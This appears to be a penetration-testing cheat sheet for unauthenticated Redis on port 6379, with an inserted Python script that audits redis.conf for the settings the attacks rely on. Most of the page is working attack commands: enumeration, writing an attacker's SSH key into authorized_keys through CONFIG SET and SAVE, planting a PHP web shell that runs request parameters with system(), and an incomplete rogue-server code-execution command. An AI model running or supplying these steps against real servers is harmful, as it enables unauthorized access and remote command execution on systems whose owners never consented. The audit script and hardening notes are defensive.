Port 6379

  • By default Redis can be accessed without credentials

#Basic Enum
info
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
config get dir
[ ... Get config ... ]

Write Files > SSH Access

  • In the output of config get dir you can find the home directory of the redis user (usually /var/lib/redis or /home/redis, with the key file going in its .ssh directory), and knowing this you know where to write the authorized_keys file to access the host via ssh as the redis user. If you know the home directory of another valid user where you have write permissions, you can abuse that in the same way.

#Generate RSA Key Pair
ssh-keygen -t rsa -C ""

#Save as .txt with padding
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

redis-cli -h <Target>
<Target>:6379> config set dbfilename "backup.rdb"
OK
<Target>:6379> save

#Empty Database
redis-cli -h <Target> flushall
cat foo.txt | redis-cli -h <Target> -x set crackit

#Dump our memory content into the authorized_keys file
redis-cli -h <Target>
<Target>:6379> config set dir /Users/antirez/.ssh/
OK
<Target>:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
<Target>:6379> config set dbfilename "authorized_keys"
OK
<Target>:6379> save

#SSH into host
ssh -i id_rsa antirez@<Target>

Write Files > PHP Web Shell

  • Requires a web service running

config set dir /var/www/html
config set dbfilename sys.php
set test "<?php system($_REQUEST['cmd']); ?>"
#set test "<?php phpinfo(); ?>"
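Both file-write sections above (SSH key and PHP web shell) depend on the same server-side conditions: an instance reachable without requirepass, the CONFIG command left available so dir and dbfilename can be changed at runtime, and a dump directory under a web root or a user home. The following Python is an added example, not part of this page, that audits a redis.conf for exactly those conditions; the two configs it checks are constructed samples.

```python
import shlex

# Constructed sample configs (not from any real host): the first carries the
# conditions this page's file-write techniques rely on, the second closes them.
WEAK_CONF = """bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html
# requirepass foobared
"""
HARDENED_CONF = """bind 127.0.0.1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

def parse_conf(text):
    """Map each directive to every argument list it appears with; shlex turns the "" of rename-command into an empty arg."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # blank lines and comments carry no setting
            continue
        args = shlex.split(line)
        conf.setdefault(args[0].lower(), []).append(args[1:])
    return conf

def audit(text):
    """One finding per setting enabling: unauthenticated access -> CONFIG SET dir/dbfilename -> SAVE into a trusted path."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: every client that reaches the port has full access")
    binds = conf.get("bind", [["0.0.0.0"]])[0]  # without bind, Redis listens on all interfaces
    if any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind on all interfaces")
    if conf.get("protected-mode", [["yes"]])[0][0].lower() != "yes":
        findings.append("protected-mode disabled")
    disabled = {a[0].upper() for a in conf.get("rename-command", []) if len(a) == 2 and a[1] == ""}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in disabled:
            findings.append(f"{cmd} command still available to clients")
    dump_dir = conf.get("dir", [["./"]])[0][0]
    if dump_dir.startswith(("/var/www", "/home", "/root")) or ".ssh" in dump_dir:
        findings.append(f"dump dir {dump_dir} is a web root or user home")
    return findings
```

Running audit(WEAK_CONF) reports six findings, one per abused setting, while audit(HARDENED_CONF) reports none; renaming CONFIG to "" is what removes the runtime dir/dbfilename change entirely.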

Rogue Server Sync Code Exec

python3 --rhost <Target> --rport 6379 --lhost --lport 6381
